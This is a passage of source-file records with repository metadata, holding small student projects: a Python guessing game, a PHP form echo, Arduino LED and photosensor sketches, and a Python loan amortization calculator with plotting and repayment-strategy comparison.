"text": "import random\n\nprint \"i am going to think in a random number.\"\no = int(raw_input(\"which range (10,100,1000) should i use?\"))\n\nu =int(raw_input(\"give me yout guess\"))\ndef diferenciador (x,y):\n z = random.randrange(0, x, 1)\n if y != z:\n if y - z >= (.5 *x):\n return \"yo losse, your number was too hight \"\n elif y - z <= (.5*x):\n return \"you losse your number was too low \"\n elif y == z:\n return \"yo won hurray\"\nprint diferenciador(o,u)\n"
},
{
"alpha_fraction": 0.6116504669189453,
"alphanum_fraction": 0.6116504669189453,
"avg_line_length": 49.5,
"blob_id": "984643cf4aa3babaf8fb0be70227fa1bd0f6c766",
"content_id": "fd7459d38fcfc31241492df7d5b02903b02ceb46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/PaginaETE/ProyectosHtml/resp.php",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "hola <?php echo htmlspecialchars($_Post['nom']); ?>.\r\nusted tiene <?php echo $_Post['edad']; ?> años.\r\n"
},
{
"alpha_fraction": 0.5763598084449768,
"alphanum_fraction": 0.5889121294021606,
"avg_line_length": 23.538461685180664,
"blob_id": "c4c082b7d82503da5aefb84f9afe0fec1d51dde3",
"content_id": "a61c1b03076b9f9e63726f634e2b242e86007b97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 39,
"path": "/Arduino/PruebaSerialpy.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int ledRojo = 8;\nint ledVerde = 9;\nint ledAmarillo = 10;\nint mssg = 0; //variable para guardar el mensaje\n \nvoid setup()\n{\n pinMode(ledRojo, OUTPUT);\n pinMode(ledAmarillo, OUTPUT);\n pinMode(ledVerde, OUTPUT); //establecemos 13 como salida\n Serial.begin(9600); //iniciando Serial\n}\n \nvoid loop()\n{\n if (Serial.available() > 0)\n {\n mssg = Serial.read(); //leemos el serial\n \n if(mssg == 'r')\n {\n digitalWrite(ledRojo, HIGH); //si entra una 'e' encendemos\n digitalWrite(ledAmarillo, LOW);\n digitalWrite(ledVerde, LOW);\n }\n else if(mssg == 'a')\n {\n digitalWrite(ledAmarillo, HIGH); //si entra una 'a' apagamos\n digitalWrite(ledRojo, LOW);\n digitalWrite(ledVerde, LOW);\n }\n else if (mssg = 'v')\n {\n digitalWrite(ledVerde, HIGH);\n digitalWrite(ledRojo, LOW); //si entra una 'e' encendemos\n digitalWrite(ledAmarillo, LOW);\n }\n }\n}"
},
{
"alpha_fraction": 0.6530612111091614,
"alphanum_fraction": 0.6700680255889893,
"avg_line_length": 18.600000381469727,
"blob_id": "97ebc2f5b822cc6b26e251dc04bd43eddea18e18",
"content_id": "060a4d001e1fabf9b971da0c686611ecd876c212",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 15,
"path": "/Arduino/PruebaFotosensor.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int Sensor = 0;\nint Lectura;\nvoid setup() {\n // put your setup code here, to run once:\npinMode(Sensor, INPUT);\nSerial.begin(9600);\n\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n Lectura = analogRead(Sensor);\n Serial.print(\"analog.Read = \");\n Serial.println(Lectura);\n}\n"
}
] | 21 |
Haiethan1/urdfBoxSquare
|
https://github.com/Haiethan1/urdfBoxSquare
|
79de672b67cc98da120b4608a448975e8ace8a6b
|
93607944180f56db3cc005c97c7cca29ab9b9757
|
0f5a31f55e8bd590b6094c762e1ac0cb67402d02
|
refs/heads/master
| 2023-01-09T23:57:28.917606 | 2020-11-15T23:50:55 | 2020-11-15T23:50:55 | 313,146,597 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5032119750976562,
"alphanum_fraction": 0.5845824480056763,
"avg_line_length": 30,
"blob_id": "818a2ed69a5126c35582e9a87a8c1048035346a0",
"content_id": "7c055edcc7fd2712ee7fc1c4b54d66357eb93baa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 467,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 15,
"path": "/box_square/square5050.py",
"repo_name": "Haiethan1/urdfBoxSquare",
"src_encoding": "UTF-8",
"text": "\n\nimport subprocess\nimport shlex\n\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x, -25, x*2 - 25)))\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x+25, x*2 - 25, 25)))\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x+50, 25, -x*2 + 25)))\n\nfor x in range(0, 25):\n subprocess.call(shlex.split('./blueBox.sh box%d %d %d' % (x+75, -x*2 + 25, -25)))\n"
}
] | 1 |
durumu/accessible-prediction
|
https://github.com/durumu/accessible-prediction
|
b9a68376c0d6091edf05506edffe6052ee792ad8
|
e309407c1f5851c18b9c44140522e965e1072cd2
|
b2887e5921767a4fa9f61c7012e814c963ddd2f2
|
refs/heads/master
| 2022-04-19T23:45:40.204299 | 2020-04-20T17:58:37 | 2020-04-20T17:58:37 | 256,038,399 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5779704451560974,
"alphanum_fraction": 0.5865058898925781,
"avg_line_length": 30.659292221069336,
"blob_id": "e63347ea779dbec3230fbf30b3d4f5d17a8b57e8",
"content_id": "9fdb4b4f4654cbe257ba8db67c1c541398dce29c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7381,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 226,
"path": "/mostlikely.py",
"repo_name": "durumu/accessible-prediction",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\r\n\r\nfrom collections import defaultdict\r\nfrom string import ascii_lowercase\r\n\r\nMAX_LOOKBACK = 4\r\nLEARN_RATE = 0.05\r\nALPH_SIZE = 27\r\nFREQUENCY_FILEPATH = 'freqs.dat'\r\n\r\nLONG_DELAY = 1500 # delay for first 3 letters\r\nMAX_L_DELAY = 10000 # max and min long delay\r\nMIN_L_DELAY = 200\r\nSHORT_DELAY = 1000 # delay for all other letters\r\nMAX_S_DELAY = MAX_L_DELAY - LONG_DELAY + SHORT_DELAY # max and min short delay are always the same distance from long delay\r\nMIN_S_DELAY = MIN_L_DELAY - LONG_DELAY + SHORT_DELAY\r\nDELAY_MOD = 100 # how much to adjust the delay by\r\n\r\n\r\ndef index(letter):\r\n if letter.isalpha():\r\n return ord(letter.lower()) - ord('a')\r\n else:\r\n return ALPH_SIZE - 1\r\n\r\n\r\ndef initialize_wiki_counts(filepath=FREQUENCY_FILEPATH):\r\n wiki_counts = defaultdict(lambda: [0] * ALPH_SIZE)\r\n with open(filepath) as f:\r\n for line in f:\r\n word, count = line.split('|')\r\n count = int(count) # we do nothing with count right now\r\n prefix, next_letter = word[:-1], word[-1]\r\n wiki_counts[prefix][index(next_letter)] = count\r\n return wiki_counts\r\n\r\n\r\nclass LetterPredictor:\r\n def __init__(self, max_lookback=MAX_LOOKBACK):\r\n self.max_lookback = min(max_lookback, MAX_LOOKBACK)\r\n self.wiki_counts = initialize_wiki_counts()\r\n self.user_counts = defaultdict(lambda: [0] * ALPH_SIZE)\r\n self.history = [' ']\r\n\r\n def priority(self, prediction, next_letter):\r\n wiki_count = self.wiki_counts[prediction][index(next_letter)]\r\n user_count = self.user_counts[prediction][index(next_letter)]\r\n return max(wiki_count, 1) * (1 + LEARN_RATE * user_count ** 1.5)\r\n\r\n def update_user_counts(self):\r\n for lookback in range(1, self.max_lookback):\r\n prefix = ''.join(self.history[-lookback - 1:-1])\r\n self.user_counts[prefix][index(self.history[-1])] += 1\r\n\r\n def next_by_priority(self):\r\n lookback = min(self.max_lookback, len(self.history))\r\n prefix = ''.join(self.history[-lookback:])\r\n\r\n def sort_key(letter):\r\n return [self.priority(prefix[start:], letter) for start in range(len(prefix))]\r\n\r\n letters = ascii_lowercase + '_'\r\n return sorted(letters, key=sort_key, reverse=True)\r\n\r\n def add_character(self, character):\r\n self.history.append(character)\r\n self.update_user_counts()\r\n\r\n\r\nclass Application(tk.Frame):\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.master = master\r\n self.pack()\r\n self.predictor = LetterPredictor()\r\n\r\n self.cursor_position = 0\r\n\r\n self.arrow_pressed = False\r\n self.uppercase = False\r\n\r\n self.create_widgets()\r\n\r\n self.master.after(LONG_DELAY, self.loop)\r\n\r\n def select_character(self, event):\r\n priority = self.predictor.next_by_priority()\r\n character_selected = priority[max(self.cursor_position, 0)]\r\n if character_selected == '_':\r\n character_selected = ' '\r\n\r\n self.arrow_pressed = False\r\n self.add_typed_character(character_selected)\r\n self.uppercase = False\r\n self.predictor.add_character(character_selected)\r\n self.reset_cursor()\r\n\r\n def backspace(self, event):\r\n self.add_typed_character(\"\\b\")\r\n self.reset_cursor()\r\n\r\n def left(self, event):\r\n self.arrow_pressed = True\r\n self.revert_cursor()\r\n\r\n def right(self, event):\r\n self.arrow_pressed = True\r\n self.advance_cursor()\r\n\r\n def shift(self, event):\r\n self.uppercase = not self.uppercase\r\n self.refresh_labels()\r\n\r\n def up(self, event):\r\n global LONG_DELAY, SHORT_DELAY, DELAY_MOD, MAX_L_DELAY, MAX_S_DELAY\r\n LONG_DELAY = min(MAX_L_DELAY, LONG_DELAY + DELAY_MOD)\r\n SHORT_DELAY = min(MAX_S_DELAY, SHORT_DELAY + DELAY_MOD)\r\n\r\n def down(self, event):\r\n global LONG_DELAY, SHORT_DELAY, DELAY_MOD, MIN_L_DELAY, MIN_S_DELAY\r\n LONG_DELAY = max(MIN_L_DELAY, LONG_DELAY - DELAY_MOD)\r\n SHORT_DELAY = max(MIN_S_DELAY, SHORT_DELAY - DELAY_MOD)\r\n\r\n def add_typed_character(self, character):\r\n self.typed_text.configure(state=\"normal\")\r\n if self.uppercase:\r\n character = character.upper()\r\n if character == \"\\b\":\r\n self.typed_text.delete(\"end-2c\")\r\n self.typed_text.delete(\"end-2c\")\r\n self.typed_text.insert(\"end\", \"|\")\r\n else:\r\n self.typed_text.insert(\"end-2c\", character)\r\n self.typed_text.configure(state=\"disabled\")\r\n\r\n def reset_cursor(self):\r\n self.cursor_position = -1\r\n self.refresh_labels()\r\n\r\n def advance_cursor(self):\r\n self.cursor_position += 1\r\n if self.cursor_position >= ALPH_SIZE:\r\n self.reset_cursor()\r\n self.refresh_labels()\r\n\r\n def revert_cursor(self):\r\n self.cursor_position -= 1\r\n if self.cursor_position < 0:\r\n self.cursor_position = ALPH_SIZE - 1\r\n self.refresh_labels()\r\n\r\n def loop(self):\r\n if not self.arrow_pressed:\r\n self.advance_cursor()\r\n\r\n delay = LONG_DELAY if self.cursor_position <= 3 else SHORT_DELAY\r\n self.master.after(delay, self.loop)\r\n\r\n def refresh_labels(self):\r\n priority = self.predictor.next_by_priority()\r\n if self.uppercase:\r\n self.order_label_text.set(''.join(priority).upper())\r\n else:\r\n self.order_label_text.set(''.join(priority))\r\n\r\n cursor_text = [' '] * 27\r\n cursor_text[max(0, self.cursor_position)] = '^'\r\n self.cursor_label_text.set(''.join(cursor_text))\r\n\r\n def create_widgets(self):\r\n self.order_label_text = tk.StringVar()\r\n self.order_label = tk.Label(\r\n self.master,\r\n textvariable=self.order_label_text,\r\n font=('Courier', 36),\r\n )\r\n self.order_label.pack(side=\"top\")\r\n\r\n self.cursor_label_text = tk.StringVar()\r\n self.cursor_label = tk.Label(\r\n self.master,\r\n textvariable=self.cursor_label_text,\r\n font=('Courier', 36),\r\n )\r\n self.cursor_label.pack(side=\"top\")\r\n\r\n self.typed_text = tk.Text(\r\n self.master,\r\n font=('Courier', 24),\r\n height=6,\r\n width=40,\r\n wrap=tk.WORD,\r\n )\r\n self.typed_text.pack(side=\"top\")\r\n\r\n self.typed_text.insert(tk.END, \"|\")\r\n self.typed_text.configure(state=\"disabled\")\r\n selectbackground = self.typed_text.cget(\"selectbackground\")\r\n self.typed_text.configure(inactiveselectbackground=selectbackground)\r\n\r\n self.refresh_labels()\r\n\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.title(\"Text Prediction Prototype\")\r\n app = Application(master=root)\r\n root.bind(\"<space>\", app.select_character)\r\n root.bind(\"<BackSpace>\", app.backspace)\r\n root.bind(\"<Left>\", app.left)\r\n root.bind(\"<Right>\", app.right)\r\n root.bind(\"<Up>\", app.up)\r\n root.bind(\"<Down>\", app.down)\r\n root.bind(\"<Shift_L>\", app.shift)\r\n app.mainloop()\r\n\r\n\r\n\"\"\"def predictions(history):\r\n lookback = min(MAX_LOOKBACK, len(history))\r\n\r\n recent = ''.join(history[-lookback:])\r\n update_user_counts(history)\r\n return next_by_priority(recent)\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n"
}
] | 1 |
TurbulentRice/loan-amortization-calculator
|
https://github.com/TurbulentRice/loan-amortization-calculator
|
78a694b0c451a40e1f6fdde10470347b6740900d
|
b15db7302d8a120a4e0eca6c7c39ef5408a54e9e
|
c9730a560d4bc52c67dec6b630e33cdf12aee11e
|
refs/heads/main
| 2023-04-20T18:36:38.878668 | 2021-05-02T20:10:01 | 2021-05-02T20:10:01 | 290,107,181 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5279359221458435,
"alphanum_fraction": 0.538550615310669,
"avg_line_length": 32,
"blob_id": "12481981818a7b299f58f039e8ac74f850656887",
"content_id": "8796bd8eac65c4170c09ae5b5ca765fe7515d91b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10363,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 314,
"path": "/loan.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# Loan data structures\n# Models loan amortization schedules\n# Pay, pay months, and payoff commands (step, steps, complete)\n# Performs replicative modeling for comparing with other Loans\n\nfrom decimal import *\n\n#########################################\n# BASE CLASS\n#########################################\n\nclass Loan:\n # Class counters\n # We'll use these to keep track of instances during runtime\n INSTANCE_COUNTER = 0\n UNTITLED_COUNTER = 0\n\n def __init__(self, sb, ir, pa=0, title=None, term=None):\n # Count this instance\n Loan.INSTANCE_COUNTER += 1\n\n # Primary attributes\n self.title = title\n self.term = term\n self.start_balance = sb\n self.int_rate = ir\n self.payment_amt = pa\n\n # Payment History {Dict of [Lists]}\n # Main ledger object for reading/writing transactions\n self.Payment_History = {\n \"balance\": [self.start_balance],\n \"principal\": [self.Dec(0)],\n \"interest\": [self.Dec(0)],\n \"pay_no\": [0]\n }\n\n ###############################\n # PRIMARY GETTER / SETTERS\n ###############################\n # Encapsulates primary instance attributes\n # Enhances attribute setting by ensuring proper type/format\n # Since we are working with Decimals, type/format is crucial\n\n # Title\n @property\n def title(self):\n return self._title\n @title.setter\n def title(self, t):\n if not t:\n Loan.UNTITLED_COUNTER += 1\n self._title = f\"Untitled({Loan.UNTITLED_COUNTER})\"\n else:\n self._title = t\n\n # Term\n @property\n def term(self):\n return self._term\n @term.setter\n def term(self, m):\n if not m:\n self._term = 12\n else:\n self._term = int(m)\n\n # Start balance\n @property\n def start_balance(self):\n return self._start_balance\n @start_balance.setter\n def start_balance(self, n):\n self._start_balance = self.Dec(n)\n\n # Interest rate\n @property\n def int_rate(self):\n return self._int_rate\n @int_rate.setter\n def int_rate(self, n):\n self._int_rate = self.Dec(n)\n\n # Payment amount\n @property\n def payment_amt(self):\n return self._payment_amt\n @payment_amt.setter\n def payment_amt(self, n):\n self._payment_amt = self.Dec(n)\n\n #######################\n # GENERAL METHODS\n #######################\n # Object str/repr\n def __str__(self):\n return self.title\n def __repr__(self):\n return self.title\n\n # Static rounding function\n # Takes number obj, convert to Decimal if necessary, round to 2 places\n @staticmethod\n def Dec(n):\n cent = Decimal('0.01')\n if not isinstance(n, Decimal):\n n = Decimal(str(n))\n return n.quantize(cent, ROUND_HALF_UP)\n\n # Check if loan is paid off\n def is_complete(self):\n return (self.current_bal == 0)\n\n def get_payment_info(self):\n return [f\"Title: {self.title}\",\n f\"Starting Balance: {self.start_balance}\",\n f\"Current Balance: ${self.current_bal}\",\n f\"Interest Rate: {self.int_rate}%\",\n f\"Number of payments made: {self.pay_no}\",\n f\"Interest Paid: ${self.get_interest_paid()}, {self.get_p_to_i('i')}%\",\n f\"Principal Paid: ${self.get_principal_paid()}, {self.get_p_to_i('p')}%\",\n f\"Total Paid: ${self.get_total_paid()}\",\n f\"Principal to Interest Ratio: {self.get_p_to_i()}:1\"\n ]\n\n #######################################\n # COMPUTATION ATTRIBUTES / METHODS\n #######################################\n\n # Properties perform pertinent, heavily used retrievals\n\n # Determine minimum payment amount (unquantized)\n @property\n def min_payment(self):\n # Discount factor = {[(1+r)n]-1}/[r(1+r)^n]\n def discount_factor():\n r = self.get_monthly_ir()\n n = self.term\n return (((1 + r) ** n) - 1) / (r * (1 + r) ** n)\n return self.start_balance / discount_factor()\n\n\n @property\n def current_bal(self):\n return self.Payment_History['balance'][-1]\n\n @property\n def pay_no(self):\n return self.Payment_History['pay_no'][-1]\n\n # Methods perform calculations\n\n def get_monthly_ir(self):\n return (self.int_rate / 12) / 100\n\n def get_int_due(self):\n return self.get_monthly_ir() * self.current_bal\n\n def get_interest_paid(self):\n return sum(self.Payment_History['interest'])\n\n def get_principal_paid(self):\n return sum(self.Payment_History['principal'])\n\n def get_total_paid(self):\n return self.get_interest_paid() + self.get_principal_paid()\n\n def get_p_to_i(self, c=None):\n if not self.get_total_paid():\n return 0\n if c is None:\n return self.Dec(self.get_principal_paid() / self.get_interest_paid())\n elif c == 'p':\n return self.Dec(self.get_principal_paid() / self.get_total_paid() * 100)\n elif c == 'i':\n return self.Dec(self.get_interest_paid() / self.get_total_paid() * 100)\n\n ###########################\n # PAYMENT METHODS\n ###########################\n # Records a new entry in Payment_History\n def install_payment(self, b, p, i):\n self.Payment_History['balance'].append(self.Dec(b))\n self.Payment_History['principal'].append(self.Dec(p))\n self.Payment_History['interest'].append(self.Dec(i))\n self.Payment_History['pay_no'].append(self.pay_no + 1)\n\n # Make one Payment\n def pay_month(self):\n # Calculate interest due and subtract from principal payment\n int_payment = self.get_int_due()\n principal_payment = self.payment_amt - int_payment\n\n # If principal_payment is greater than balance,\n if principal_payment > self.current_bal:\n # only pay current balance (never overpay)\n principal_payment = self.current_bal\n\n # Calculate balance forward (capitalize or reduce)\n bal_fwd = self.current_bal - principal_payment\n\n # If payment won't cover interest (negative principal_payment),\n if principal_payment < 0:\n # entire payment goes to interest, no principal payment\n int_payment = self.payment_amt\n principal_payment = 0\n\n # Install payment\n self.install_payment(bal_fwd, principal_payment, int_payment)\n\n # Make m payments, checking for completion each iteration\n def pay_months(self, m: int):\n for i in range(m):\n if self.is_complete():\n break\n self.pay_month()\n\n # Make payments until repayment complete, return T or F based on completion\n def payoff(self):\n # Handle infinite loop (payments can't cover interest)\n if self.payment_amt <= self.get_int_due():\n return False\n\n # Otherwise, loop until paid off\n while not self.is_complete():\n self.pay_month()\n\n print(f'payoff() call on \"{self.title}\" made {self.pay_no} calculations')\n return True\n\n#########################################\n# CHILD CLASS\n#########################################\n\n# Inherits all from parent, added duplicative pay methods\nclass StandardLoan(Loan):\n\n ###############################################\n # ITERATIVE DUPLICATIVE SOLVE METHODS\n ###############################################\n\n # Return a new StandardLoan using self's state as init data\n def branch(self):\n b = self.current_bal\n i = self.int_rate\n pa = self.payment_amt\n t = self.title + '(branch)'\n m = self.term\n return StandardLoan(b, i, pa, title=t, term=m)\n\n # Call payoff() on a branch of self\n # Return paid branch loan obj\n def solve(self):\n branch = self.branch()\n if branch.payoff():\n return branch\n \n print(\"Did not complete repayment\")\n\n ###############################################\n # RECURSIVE DUPLICATIVE SOLVE METHODS\n ###############################################\n # BENEFITS:\n # Marginal time benefit with small # of calculations\n # TIME TRIAL:\n # iterations 154 516 992(max recursive depth)\n # solve_in_place(): 0.00040s 0.0012s 0.0024\n # payoff(): 0.00035s 0.0011s 0.0023\n # rec_solve(): 0.00019s 0.0013s 0.0019\n # DISADVANTAGES OF RECURSION:\n # Depth = nump_p, maximum ~= 1000 iterations,\n\n # Wrappers for solve()\n def solve_for_interest(self):\n return self.recursive_solve()[1]\n def solve_for_np(self):\n return self.recursive_solve()[2]\n\n # Recursive Pay Method\n # Models an amortization schedule w/o altering object\n # goal = number of payments to make\n def recursive_solve(self, goal=None):\n # Inner function performs recursive pay\n def inner(c_bal, i_c=0, num_p=0):\n # End condition: Balance reaches 0, or num payments satisfied\n if c_bal == 0 or num_p == goal:\n print(f'This solve() call on {self.title} made {num_p} calculations')\n # Also, should we consider any amount paid over s_bal to be int?\n # All extra is, after all, just capitalized int\n # so i_c += (principal_paid - s_bal)\n return [c_bal, i_c, num_p]\n # Body of loop, mirrors implementation of Loan.pay_month()\n ip = _mir * c_bal\n pmt = _pa - ip\n # Handle underpayment/overpayment\n if pmt < 0:\n ip = _pa\n elif pmt >= c_bal:\n pmt = c_bal\n\n return inner(c_bal-pmt, i_c+ip, num_p+1)\n\n # Outer layer captures current loan state for use by inner\n s_bal = self.current_bal\n _mir = self.get_monthly_ir()\n _pa = self.payment_amt\n\n # Don't execute if no goal is set and payments can't cover interest\n if (goal is None) and (_pa <= (_mir * s_bal)):\n print(\"Minimum payment not met\")\n return [s_bal, 0, 0]\n\n # Otherwise, call recursive inner,\n return inner(s_bal)\n\n"
},
{
"alpha_fraction": 0.8042722344398499,
"alphanum_fraction": 0.8042722344398499,
"avg_line_length": 33.7068977355957,
"blob_id": "78bbe3d3eb1f0a1ad99a09d6c1610076de623977",
"content_id": "01baedcf3f81a5e98b425ee0cfa57fc6438a74f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2013,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 58,
"path": "/README.md",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# loan-amortization-calculator\n\nModels and plots loan repayment timelines. Compares multi-loan repayment algorithms to determine optimum payment schedule/strategy.\n\nWork in progress! Currently moving plotting functions to loan_plot.py class for clearer modularization,\nas well as updating view_controller.py to allow user to interact with PriorityQueue objects in the GUI.\n\nIncludes:\n\n- Model-View-Controller structure for main app.\n- TKinter GUI, custom Frame class.\n- Matplotlib plotting functions.\n- MySQL database connection with functions for saving payment histories, running queries, and basic SQL commands.\n- Loan data structures for modeling real-world loans.\n- PriorityQueue data structure for working with and comparing multiple Loans\n- MethodCompare data structure for working with and comparing multiple PriorityQueues\n\nRepayment methods/algorithms modeled in priority_queue.py include Snowball, Avalanche, and custom algorithms Blizzard, Cascade, and Ice Slide.\n\nALGORITHM METHODS:\n\n---\n\nORDERED: Focus on targeting a single loan each cycle,\npaying only minimums on all except target,\npaying one off at a time\n\n---\n\nAvalanche: Order loans by interest rate, balance,\ntarget highest ir until all paid off.\nConsistently results in lowest interest paid\nover course of large loans.\n\nBlizzard: Order loans by monthly interest cost,\ntarget most expensive until all paid off.\nProvides some benefits for small loans,\nand/or large budgets\n\nSnowball: Order loans by balance, target loan with\nlowest starting bal, pay until all paid off.\nLargely motivaitonal, not cost-effective.\n\n---\n\nUNORDERED: Focus on spreading payments strategically, rather\nthan strict targeting. In the short term, these\nmethods can reduce monthly cost.\n\n---\n\nCascade: Unordered, distribute % of budget to each loan\nproportional to its % contribution to total\ninterest rate of all loans.\n\nIce Slide: Unordered, distribute % of budget to each loan\nproportional to its % contribution to total\nmonthly cost (minimum payments) of all loans.\n"
},
{
"alpha_fraction": 0.6102693676948547,
"alphanum_fraction": 0.6106902360916138,
"avg_line_length": 22.49505043029785,
"blob_id": "77f9464f0b60e0853543a69ade77b6252da42210",
"content_id": "0a8f8238aff1cd9769917ea06007f536f059e9b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2376,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 101,
"path": "/loan_plot.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# View / plotting module\n\nfrom loan import *\nfrom priority_queue import *\n\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\n\n# Plots any loan_obj type (Loan, PriorityQueue, list of PriorityQueues)\nclass LoanPlot:\n\tdef __init__(self, obj):\n\n\t\t# Main object:\n\t\tself.loan_obj = obj\n\n\t\t# Private attributes:\n\t\t#self.p_func\n\t\t#self.size\n\n\t################################################\n\t#\t'PRIVATE\" PROPERTIES\n\t#\t- Solely for use within object\n\t#\t- Encapsulte these attributes to ensure uniformity\n\t################################################\n\t# Main object getter/setter\n\t# Determines local plotting function (p_func) and size\n\t@property\n\tdef loan_obj(self):\n\t\treturn self._loan_obj\n\t@loan_obj.setter\n\tdef loan_obj(self, o):\n\t\tif isinstance(o, MethodCompare):\n\t\t\tself.p_func = LoanPlot.plot_queues\n\t\t\tself.size = len(o.grid)\n\n\t\telif isinstance(o, PriorityQueue):\n\t\t\tself.p_func = LoanPlot.plot_q\n\t\t\tself.size = o.size\n\n\t\telif isinstance(o, Loan):\n\t\t\tself.p_func = LoanPlot.plot_l\n\t\t\tself.size = 1\n\n\t\t# Raise error if anyhting other than loan, queue, or list\n\t\telse:\n\t\t\tprint(\"Invalid type for LoanPlot.loan_obj\")\n\t\t\traise TypeError\n\n\t\tself._loan_obj = o\n\n\t# Local plotting function\n\t@property\n\tdef p_func(self):\n\t\treturn self._p_func\n\t@p_func.setter\n\tdef p_func(self, func):\n\t\tself._p_func = func\n\t\n\t# Size\n\t@property\n\tdef size(self):\n\t\treturn self._size\n\[email protected]\n\tdef size(self, s):\n\t\tself._size = s\n\n\t########################################\n\t#\t\"PRIVATE\" METHODS\n\t#\t- Main object methods \n\t########################################\n\t# Wrapper for easy plotting using a LoanPlot object\n\tdef plot_history(self):\n\t\tself.p_func(self.loan_obj)\n\t\tplt.show()\n\n\t########################################\n\t#\t\"PUBLIC\" METHODS\n\t#\t- Accessible without object\n\t########################################\n\t# Gets a MethodCompare object, plots each on it's own graph\n\t@staticmethod\n\tdef plot_queues(mc):\n\t\tfor q in mc.grid:\n\t\t\tLoanPlot.plot_q(q)\n\n\t# Gets a Queue, makes new fig and plots each loan\n\t@staticmethod\n\tdef plot_q(q):\n\t\tfig, ax = plt.subplots(num=q.title)\n\t\tfor l in q.Q:\n\t\t\tLoanPlot.plot_l(l, ax)\n\n\t# Gets a Loan, Axes, plots on new Axes if none given\n\t@staticmethod\n\tdef plot_l(loan, ax=None):\n\t\tif not ax:\n\t\t\tax = plt.axes()\n\t\tx_axis = loan.Payment_History['pay_no']\n\t\ty_axis = loan.Payment_History['balance']\n\t\tax.plot(x_axis, y_axis)\n\n\t\n"
},
{
"alpha_fraction": 0.6125630736351013,
"alphanum_fraction": 0.6542870402336121,
"avg_line_length": 23.494382858276367,
"blob_id": "389577ea4792e13bb7ff489b62924ad8fbfe8c07",
"content_id": "65ee6ce399b0c28c7c4bb78b63f3fda438a8abeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2181,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 89,
"path": "/main.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# Program that models individual loan ammortization schedules, \n# Compares repayment strategy timelines across multiple Loans,\n# Finds \"best\" payment configuration\n\n# Implemenet Model-View-Controller design pattern\n# Model:\tloan.py, Loan data structures\n# View:\t\tloan_plot\n# Control:\ttk UI\n\nfrom view_controller import *\nfrom loan_plot import *\nfrom priority_queue import PriorityQueue\nimport random\n\n############\n# MAIN\n############\nif __name__ == \"__main__\":\n\n\tdef get_rand_budg():\n\t\treturn random.uniform(800, 2000)\n\n\tdef get_rand_loans(n):\n\t\tdef r_bal():\n\t\t\treturn random.uniform(2000, 25000)\n\t\tdef r_ir():\n\t\t\treturn random.uniform(1, 12)\n\t\tdef r_term():\n\t\t\treturn random.randint(12, 360)\n\t\treturn [StandardLoan(r_bal(), r_ir(), term=r_term()) for i in range(n)]\n\n\t##########################################\n\t#Specific example\n\tmy_budget = 1200\n\tmy_loans = [\n\t\tStandardLoan(2406.65, 4.41, title=\"2014\", term=120),\n\t\tStandardLoan(2472.91, 3.61, title=\"2013\", term=120)\n\t\t#StandardLoan(6282.30, 6.1, title=\"2012\", term=120),\n\t\t#StandardLoan(5930.42, 6.1, title=\"2011\", term=120)\n\t\t]\n\n\t# Random example\n\t# my_budget = get_rand_budg()\n\t# my_loans = get_rand_loans(4)\n\n\t##########################################\n\n\t# Start our primary queue and display\n\tmy_Queue = PriorityQueue(my_loans, my_budget, title=\"My Loans\")\n\n\tmy_Queue.display_info()\n\n\t# Get a new paid-off queue for each repayment mehtod\n\t# avalanche = my_Queue.avalanche()\n\t# cascade = my_Queue.cascade()\n\t# ice_slide = my_Queue.ice_slide()\n\t# blizzard = my_Queue.blizzard()\n\t# snowball = my_Queue.snowball()\n\n\t# Get a MethodCompare obj of paid off queues sorted by goal\n\tbest = my_Queue.find_best(goal='interest', minimum='int')\n\n\t# Display all completed q ordered by \"best\" method\n\tprint(f'Best:')\n\tbest.display_info(histories=True)\n\n\n\tprint(Loan.INSTANCE_COUNTER)\n\n\t#JSON Save feature\n\tc = input(\"Would you like to save results? (y/n): \")\n\tif c == 'y':\n\t\tfor q in 